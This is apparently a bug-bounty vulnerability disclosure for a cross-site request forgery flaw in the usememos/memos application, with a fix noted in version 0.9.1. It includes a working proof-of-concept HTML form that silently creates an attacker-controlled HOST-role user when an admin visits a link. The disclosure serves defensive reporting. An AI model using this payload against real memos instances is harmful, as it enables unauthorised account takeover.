CSRF allows attacker trigger admin add HOST user lead to takeover memos application in usememos/memos

Valid

Reported on

Dec 29th 2022

Description

This vuln allow attacker trigger admin submitting a malicious request to create new user with any role.

Proof of Concept

  1. Attacker create malicious script with csrf payload and upload it to attacker server httpx://attacker.server/csrf.html
  2. Attacker send this link to memos admin
  3. Memos admin click this link and trigger csrf attack, a user with HOST role under attacker control will be create POC video: https://drive.google.com/file/d/1vUobMDZ3rzdbj-UfLU6-qiZD9ILqXDzK/view?usp=sharing POC payload
//CSRF.html
<html>
  <!-- CSRF PoC to add HOST user into memos -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.memos.server/api/user" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;attackerhere&quot;&#44;&quot;password&quot;&#58;&quot;123456&quot;&#44;&quot;role&quot;&#58;&quot;HOST&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

If amin trigger this attack concept, attacker can takeover memos application with HOST role

References

We are processing your report and will contact the usememos/memos team within 24 hours. 11 days ago
STEVEN validated this vulnerability 11 days ago
1'"<> has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago
eminealtug
11 days ago

Çekme işlemini tamamlamama yardim

to join this conversation